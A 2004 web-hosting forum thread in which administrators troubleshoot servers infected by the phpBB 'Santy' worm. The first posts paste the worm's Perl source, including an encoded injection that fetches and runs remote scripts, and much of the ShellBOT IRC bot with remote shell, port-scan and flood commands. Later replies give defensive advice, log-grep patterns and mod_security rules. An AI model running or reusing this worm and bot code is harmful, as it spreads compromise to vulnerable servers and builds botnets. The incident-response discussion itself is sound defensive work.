The Community Forums


Hacked ? Perl files in tmp - high load

Discussion in 'General Discussion' started by jeroman8, Dec 24, 2004.

  1. jeroman8

    jeroman8 Well-Known Member

    On 2 of our servers there are files created in the tmp directory.
    They're Perl files and they are running and causing heavy load on the system.
    When I delete these files and kill the processes all is fine for a little while
    but then the files are back and running.

    The files are owned by user nobody.

    How do I track where these files are created from?
    Whether it's SSH, or whether it's from a board script or other PHP script that is bad...

    What should I do :-( -- I have no idea !!
    If anyone here is willing to work with this please let me know and I will be happy
    to pay for your services, e-mail: jerry@jr-media.biz

    Here are 2 of the scripts and some of the names they're called:

    worm.txt, unbot.txt, boot.txt and then some crazy filenames also...
    There are several files named like this and copies like worm1.txt, worm2.txt....

    Worm.txt =

    -------------------------------------------------------------------------------------

    #/usr/bin/perl

    use IO::Socket;
    use LWP::Simple;
    my $processo = "/usr/bin/httpd -DSSL";
    $0="$processo"."\0"x16;;
    my $pid=fork;
    exit if $pid;
    die "Problema com o fork: $!" unless defined($pid);


    @vul = "";
    $a=0;
    $numero = int rand(999);
    $site = "www.google.com";
    $procura = "inurl:viewtopic.php?t=$numero";

    ######################################
    for($n=0;$n<90;$n += 10){
    $sock = IO::Socket::INET->new(PeerAddr=>"$site",PeerPort=>"80",Proto=>"tcp") or next;
    print $sock "GET /search?q=$procura&start=$n HTTP/1.0\n\n";
    @resu = <$sock>;
    close($sock);
    $ae = "@resu";
    while ($ae=~ m/<a href=.*?>.*?<\/a>/){
    $ae=~ s/<a href=(.*?)>.*?<\/a>/$1/;
    $uber=$1;
    if ($uber !~/translate/)
    {if ($uber !~ /cache/)
    {if ($uber !~ /"/)
    {if ($uber !~ /google/)
    {if ($uber !~ /216/)
    {if ($uber =~/http/)
    {if ($uber !~ /start=/)
    {
    if ($uber =~/&/)
    {
    $nu = index $uber, '&';
    $uber = substr($uber,0,$nu);
    }
    $vul[$a] = $uber;
    $a++;
    }}}}}}}}}
    ##########################
    for($cadenu=1;$cadenu <= 99; $cadenu +=10){

    @cade = get("http://cade.search.yahoo.com/search?p=$procura&ei=UTF-8&fl=0&all=1&pstart=1&b=$cadenu") or next;
    $ae = "@cade";

    while ($ae=~ m/<em class=yschurl>.*?<\/em>/){
    $ae=~ s/<em class=yschurl>(.*?)<\/em>/$1/;
    $uber=$1;

    $uber =~ s/ //g;
    $uber =~ s/<b>//g;
    $uber =~ s/<\/b>//g;
    $uber =~ s/<wbr>//g;

    if ($uber =~/&/)
    {
    $nu = index $uber, '&';
    $uber = substr($uber,0,$nu);
    }
    $vul[$a] = $uber;
    $a++
    }}

    #########################


    $cmd = '&highlight=%2527%252esystem(chr(99)%252echr(100)%252echr(32)%252echr(47)%252echr(116)%252echr(109)%252echr(112)%252echr(59)%252echr(119)%252echr(103)%252echr(101)%252echr(116)%252echr(32)%252echr(119)%252echr(119)%252echr(119)%252echr(46)%252echr(116)%252echr(101)%252echr(110)%252echr(104)%252echr(97)%252echr(115)%252echr(101)%252echr(117)%252echr(115)%252echr(105)%252echr(116)%252echr(101)%252echr(46)%252echr(99)%252echr(111)%252echr(109)%252echr(47)%252echr(98)%252echr(111)%252echr(116)%252echr(46)%252echr(116)%252echr(120)%252echr(116)%252echr(59)%252echr(112)%252echr(101)%252echr(114)%252echr(108)%252echr(32)%252echr(98)%252echr(111)%252echr(116)%252echr(46)%252echr(116)%252echr(120)%252echr(116)%252echr(59)%252echr(119)%252echr(103)%252echr(101)%252echr(116)%252echr(32)%252echr(119)%252echr(119)%252echr(119)%252echr(46)%252echr(116)%252echr(101)%252echr(110)%252echr(104)%252echr(97)%252echr(115)%252echr(101)%252echr(117)%252echr(115)%252echr(105)%252echr(116)%252echr(101)%252echr(46)%252echr'.'(99)%252echr(111)%252echr(109)%252echr(47)%252echr(119)%252echr(111)%252echr(114)%252echr(109)%252echr(46)%252echr(116)%252echr(120)%252echr(116)%252echr(59)%252echr(112)%252echr(101)%252echr(114)%252echr(108)%252echr(32)%252echr(119)%252echr(111)%252echr(114)%252echr(109)%252echr(46)%252echr(116)%252echr(120)%252echr(116))%252e%2527';


    $b = scalar(@vul);

    for($a=0;$a<=$b;$a++)
    {

    $sitevul = $vul[$a] . $cmd;
    if($sitevul !~/http/){ $sitevul = 'http://' . $sitevul; }
    $res = get($sitevul) or next;
    }
     
  2. jeroman8

    jeroman8 Well-Known Member

    ----------------------------------------------------------------------------------------------------
    the beginning of bot.txt =

    #!/usr/bin/perl
    #
    # ShellBOT - Atrix Team
    #
    # 0ldW0lf - oldwolf@atrix-team.org
    # - www.atrix-team.org
    # - www.atrix.cjb.net
    #
    # modificado por poerschke
    # irc.gigachat.net #spykids
    #
    ################ CONFIGURACAO #################################################################
    my $processo = "/hsphere/shared/apache/bin/httpd -DSSL"; # Nome do processo que vai aparece no ps #
    #----------------------------------------------################################################
    my $linas_max="10"; # Evita o flood :) depois de X linhas #
    #----------------------------------------------################################################
    my $sleep="4"; # ele dorme X segundos #
    ##################### IRC #####################################################################
    @adms=("poerschke"); # Nick do administrador #
    #----------------------------------------------################################################
    my @canais=("#perl"); # Caso haja senha ("#canal :senha") #
    #----------------------------------------------################################################
    my $nick="spykids"; # Nick do bot. Caso esteja em uso vai aparecer #
    # aparecer com numero radonamico no final #
    #----------------------------------------------################################################
    my $ircname = "worm"; # User ID #
    #----------------------------------------------################################################
    chop (my $realname = `uname -a`); # Full Name #
    #----------------------------------------------################################################
    $servidor="irc.gigachat.net" unless $servidor; # Servidor de irc que vai ser usado #
    # caso não seja especificado no argumento #
    #----------------------------------------------################################################
    my $porta="6667"; # Porta do servidor de irc #
    ################ ACESSO A SHELL ###############################################################
    my $secv = 1; # 1/0 pra habilita/desabilita acesso a shell #
    ###############################################################################################

    my $VERSAO = "0.2";

    $SIG{"INT"} = "IGNORE";
    $SIG{"HUP"} = "IGNORE";
    $SIG{"TERM"} = "IGNORE";
    $SIG{"CHLD"} = "IGNORE";
    $SIG{"PS"} = "IGNORE";

    use IO::Socket;
    use Socket;
    use IO::Select;
    chdir("/");
    $servidor="$ARGV[0]" if $ARGV[0];
    $0="$processo"."\0"x16;;
    my $pid=fork;
    exit if $pid;
    die "Problema com o fork: $!" unless defined($pid);



    our %irc_servers;
    our %DCC;
    my $dcc_sel = new IO::Select->new();

    #############################
    # B0tchZ na veia ehehe :P #
    #############################

    $sel_cliente = IO::Select->new();
    sub sendraw {
    if ($#_ == "1") {
    my $socket = $_[0];
    print $socket "$_[1]\n";
    } else {
    print $IRC_cur_socket "$_[0]\n";
    }
    }

    sub conectar {
    my $meunick = $_[0];
    my $servidor_con = $_[1];
    my $porta_con = $_[2];

    my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$servidor_con", PeerPort=>$porta_con) or return(1);
    if (defined($IRC_socket)) {
    $IRC_cur_socket = $IRC_socket;

    $IRC_socket->autoflush(1);
    $sel_cliente->add($IRC_socket);

    $irc_servers{$IRC_cur_socket}{"host"} = "$servidor_con";
    $irc_servers{$IRC_cur_socket}{"porta"} = "$porta_con";
    $irc_servers{$IRC_cur_socket}{"nick"} = $meunick;
    $irc_servers{$IRC_cur_socket}{"meuip"} = $IRC_socket->sockhost;
    nick("$meunick");
    sendraw("USER $ircname ".$IRC_socket->sockhost." $servidor_con :$realname");
    sleep 1;
    }

    }
    my $line_temp;
    while( 1 ) {
    while (!(keys(%irc_servers))) { conectar("$nick", "$servidor", "$porta"); }
    delete($irc_servers{""}) if (defined($irc_servers{""}));
    &DCC::connections;
    my @ready = $sel_cliente->can_read(0);
    next unless(@ready);
    foreach $fh (@ready) {
    $IRC_cur_socket = $fh;
    $meunick = $irc_servers{$IRC_cur_socket}{"nick"};
    $nread = sysread($fh, $msg, 4096);
    if ($nread == 0) {
    $sel_cliente->remove($fh);
    $fh->close;
    delete($irc_servers{$fh});
    }
    @lines = split (/\n/, $msg);

    for(my $c=0; $c<= $#lines; $c++) {
    $line = $lines[$c];
    $line=$line_temp.$line if ($line_temp);
    $line_temp="";
    $line =~ s/\r$//;
    unless ($c == $#lines) {
    parse("$line");
    } else {
    if ($#lines == 0) {
    parse("$line");
    } elsif ($lines[$c] =~ /\r$/) {
    parse("$line");
    } elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) {
    parse("$line");
    } else {
    $line_temp = $line;
    }
    }
    }
    }
    }



    sub parse {
    my $servarg = shift;
    if ($servarg =~ /^PING \:(.*)/) {
    sendraw("PONG :$1");
    } elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) {
    my $pn=$1; my $onde = $4; my $args = $5;
    if ($args =~ /^\001VERSION\001$/) {
    notice("$pn", "\001VERSION ShellBOT-$VERSAO por 0ldW0lf\001");
    }
    if (grep {$_ =~ /^\Q$pn\E$/i } @adms) {
    if ($onde eq "$meunick"){
    shell("$pn", "$args");
    }
    if ($args =~ /^(\Q$meunick\E|\!atrix)\s+(.*)/ ) {
    my $natrix = $1;
    my $arg = $2;
    if ($arg =~ /^\!(.*)/) {
    ircase("$pn","$onde","$1") unless ($natrix eq "!atrix" and $arg =~ /^\!nick/);
    } elsif ($arg =~ /^\@(.*)/) {
    $ondep = $onde;
    $ondep = $pn if $onde eq $meunick;
    bfunc("$ondep","$1");
    } else {
    shell("$onde", "$arg");
    }
    }
    }
    } elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) {
    if (lc($1) eq lc($meunick)) {
    $meunick=$4;
    $irc_servers{$IRC_cur_socket}{"nick"} = $meunick;
    }
    } elsif ($servarg =~ m/^\:(.+?)\s+433/i) {
    nick("$meunick".int rand(9999));
    } elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) {
    $meunick = $2;
    $irc_servers{$IRC_cur_socket}{"nick"} = $meunick;
    $irc_servers{$IRC_cur_socket}{"nome"} = "$1";
    foreach my $canal (@canais) {
    sendraw("JOIN $canal");
    }
    }
    }

    sub bfunc {
    my $printl = $_[0];
    my $funcarg = $_[1];
    if (my $pid = fork) {
    waitpid($pid, 0);
    } else {
    if (fork) {
    exit;
    } else {
    if ($funcarg =~ /^portscan (.*)/) {
    my $hostip="$1";
    my @portas=( 44464, 4444, 14589, 666, 6666, 6968, 26092, 530, 46256, 31337,
    2222, 3879, 30464, 40193, 36864, 33270, 36864, 40193, 30464,
    8008, 1234, 6969, 7788, 1524, 10000, 12321, 43690, 3333,
    9999, 8975, 16705, 2313, 21317, 36864, 13330, 58821, 6682, 5678,
    45295, 65535, 26112, 7512, 24876, 9191, 5321, 50766, 1492, 12345,
    12346, 6969, 6970, 12666, 1666, 80, 21, 23, 25, 110, 5252, 9988,
    41254, 5074, 139, 44123);
    my (@aberta, %porta_banner);
    foreach my $porta (@portas) {
    my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto => "tcp", Timeout => 4);
    if ($scansock) {
    push (@aberta, $porta);
    $scansock->close;
    }
    }

    if (@aberta) {
    sendraw($IRC_cur_socket, "PRIVMSG $printl :portas abertas: @aberta");
    } else {
    sendraw($IRC_cur_socket,"PRIVMSG $printl :Nenhuma porta aberta foi encontrada");
    }
    }




    if ($funcarg =~ /^pacota\s+(.*)\s+(\d+)\s+(\d+)/) {
    my ($dtime, %pacotes) = attacker("$1", "$2", "$3");
    $dtime = 1 if $dtime == 0;
    my %bytes;
    $bytes{igmp} = $2 * $pacotes{igmp};
    $bytes{icmp} = $2 * $pacotes{icmp};
    $bytes{o} = $2 * $pacotes{o};
    $bytes{udp} = $2 * $pacotes{udp};
    $bytes{tcp} = $2 * $pacotes{tcp};

    .... and it continues...
     
  3. haze

    haze Well-Known Member

    The first one looks like the phpBB worm making the rounds (a few variants out there I believe). The second is probably a bot used for evil purposes. I'd hire someone that knows the ins and outs of your OS to help lock you down and secure your phpBB setup (they're probably all exploited by now).
     
  4. chirpy

    chirpy Well-Known Member

    Yup, phpBB worm - it's spreading at an alarming rate too. There is a handy WHM cPanel Pro Addon tool for checking for installations on your server.
     
  5. XPerties

    XPerties Well-Known Member


    And mind telling us what the handy tool is called?
     
  6. netlook

    netlook Well-Known Member
    PartnerNOC

    I think first of all the 'system' command should be in disabled_functions at php.ini :cool:
     
  7. fmalekpour

    fmalekpour Well-Known Member
    PartnerNOC

    Try to rename the "wget":
    mv /usr/bin/wget /usr/bin/wget.renamed123009867

    then use the "Addon Script Manager" in WHM (it's in "Add-ons" section) to upgrade all phpBB forums.

    - Farhad
     
  8. rpmws

    rpmws Well-Known Member

    guys I got hit today with this. I patched everything I thought like on the 21st. I updated apache also. I started moving all the phpBB installs that looked old to the users' root folders.. and the versions that were installed from cPanel I upgraded and verified as ok.

    this morning at 4am my MRTG loads ramped up with 99% /hsphere/apache thing in TOP and my loads stayed there. I found 3 processes. Killed them ..looked in temp and the time stamp on the worm and bot files was Dec24 10am. Now what I am doing is trying to lock down long enough to do the x-mas thing with family. I waxed /tmp crap and chmod 000 wget for now.

    What I don't have yet is knowledge of what this nasty little bastard does and what needs to be cleaned up and, most important, what to grep for in the logs so I can figure out what site was the problem. I found one phpnuke site that I removed but that was back 4 days ago.

    Can you guys help me out ... running out of time today. I guess I could grep the httpd logs for a certain string or something? what's the quickest way to find this sucka? I might have some bots running maybe???? thanks in advance guys ..will check back in a few.

    OH ..doesn't this thing rewrite some php files? what string to search for and easiest way to just search and look in /home/users/public_html/* ???

    I think maybe I was too late with my patches and he has been sitting there waiting for last night.
     
  9. fmalekpour

    fmalekpour Well-Known Member
    PartnerNOC

    It's a worm, not a hacker; keeping the wget permission at 700 will prevent it from working properly.

    PS: Anyone know how to filter GET commands at the entry point of apache? I know there are some filtering systems on Apache 2 but cpanel uses 1.3 :confused:


    - Farhad
     
  10. haze

    haze Well-Known Member

    Guys, this really has been extensively discussed the past few days, if you have a search on these forums you'll find some information on how to prevent and help and resolve these issues. I really don't have the time to post more info but this might be of assistance:
    http://forums.cpanel.net/showpost.php?p=159778&postcount=13

    We all don't have much time, but honestly the info is here and at webhostingtalk.com. Have a search and you all should be able to sort this out and keep some sort of sanity during the holidays!

    Best wishes all!

    PS. Subscribe to bugtraq at securityfocus.com and search through the logs, some interesting information and usually this sort of stuff is posted there before anywhere else ( depends ).
     
  11. XPerties

    XPerties Well-Known Member

    Sorry ol' mighty one. For your info, I did use the search function. Forgive me for not finding the correct post.

    Happy holidays.
     
  12. eagle

    eagle Well-Known Member

    Okay, removed the files, chmodded wget and the new files are not coming in anymore.

    But, the worm is present:


    So it probably hides in a file somewhere.

    Killing perl and restarting apache doesn't help. Does anyone have an idea of how to find this sucker? I really don't see a solution in the mentioned threads.

    I had the second version, also with the irc bot.

    Thanks
     
  13. fmalekpour

    fmalekpour Well-Known Member
    PartnerNOC

    It comes from outside, search for spybot.txt in domlogs (/usr/local/apache/domlogs) to find which account of yours is the target.

    Also "Addon Script Manager" in CPanel pro can help you to find outdated installs of phpBB.
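    One way to run that domlog search, added here as an example and not from any poster in this thread: it greps every log in a directory for the markers the worm posted above leaves in a request line (the double-encoded highlight= quote, the chr() concatenation, the fetched .txt droppers) and prints which log (i.e. which site), which client IP and which request matched. The log directory and the sample log lines are constructed for the demo; on a cPanel box the directory would be /usr/local/apache/domlogs as named above.

```shell
#!/bin/sh
# Added example (not from the thread). Scan Apache per-domain logs for the
# phpBB "highlight" injection used by the worm posted above and report which
# site was hit. The directory and sample log below are constructed for a demo.

# Markers the posted worm leaves in a request line:
#  - a double-encoded quote in the highlight parameter (%2527)
#  - chr() concatenation (%252echr) used to spell out the system() command
#  - the .txt droppers it fetches into /tmp
PATTERN='highlight=%2527|%252echr\(|(bot|worm|spybot)[0-9]*\.txt'

# worm_hits LOGDIR -> one tab-separated "logfile  client_ip  request" per hit
worm_hits() {
    dir=$1
    grep -E -H "$PATTERN" "$dir"/* 2>/dev/null |
    awk -F'"' '{
        # $1 is "file:ip - - [date] " (everything before the first quote);
        # the first ":" separates the file name from the log line
        split($1, lead, ":")
        sub(/ .*/, "", lead[2])        # keep only the client IP field
        print lead[1] "\t" lead[2] "\t" $2
    }'
}

# Number of matching lines, handy for scripting and for the test below
worm_hit_count() {
    worm_hits "$1" | wc -l | tr -d ' '
}

# --- constructed demo logs, mimicking /usr/local/apache/domlogs/<domain> ---
demo=$(mktemp -d)
cat > "$demo/example-forum.test" <<'EOF'
198.51.100.7 - - [24/Dec/2004:10:02:11 +0000] "GET /forum/viewtopic.php?t=42&highlight=%2527%252esystem(chr(99)%252echr(100))%252e%2527 HTTP/1.0" 200 5123 "-" "-"
203.0.113.9 - - [24/Dec/2004:10:05:40 +0000] "GET /forum/viewtopic.php?t=42 HTTP/1.1" 200 9876 "-" "Mozilla/5.0"
EOF
cat > "$demo/clean-site.test" <<'EOF'
192.0.2.15 - - [24/Dec/2004:11:00:00 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
EOF

# The demo directory is left in place so the output can be inspected
worm_hits "$demo"
```

    The log file name tells you which domain (and so which account) the request hit, which is the question eagle and rpmws were trying to answer.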
     
  14. rpmws

    rpmws Well-Known Member


    Just narrowed down the site in 2 minutes!!! thanks for the help ..simple answer really helped me out here. In my case it was a postnuke site :(
     
  15. rpmws

    rpmws Well-Known Member

    guys it looks like I was hit with what they are calling sanity.c or santy.c worm. I found a ton of files in /tmp

    terrorworm.txt
    worm1.txt

    and a bunch more. I am worried about bots running. wget is locked down now and no abnormal behavior on this box that I can see. What would you guys do to look for stuff this thing could have done?
     
  16. chirpy

    chirpy Well-Known Member

    The apache module mod_security does this.
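    A minimal mod_security ruleset of the kind chirpy is pointing at, answering Farhad's question about filtering GET requests on Apache 1.3; it is an added example, not configuration from the thread or from the mod_security project. It uses mod_security 1.x directive names (the series that ran on Apache 1.3) and only the `highlight` parameter, which is the one the posted worm abuses; everything else about the deployment is assumed.

```apache
# Added example, not from the thread: mod_security 1.x rules for Apache 1.3
# that stop the phpBB viewtopic.php "highlight" injection used by the worm.
<IfModule mod_security.c>
    SecFilterEngine On
    SecFilterScanPOST On
    SecFilterCheckURLEncoding On
    # Reject and log instead of letting the request reach phpBB
    SecFilterDefaultAction "deny,log,status:403"

    # The injection arrives double-encoded (%2527); after one decode the
    # highlight argument contains %27 followed by PHP code built from chr()
    # and system(). Match on the decoded argument value.
    SecFilterSelective ARG_highlight "(%27|'|chr\(|system\()"

    # Catch the same request in its raw, still double-encoded form
    SecFilterSelective THE_REQUEST "highlight=%2527"
</IfModule>
```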
     
  17. eagle

    eagle Well-Known Member

    You're right. I looked in the wrong place. Thanks.
     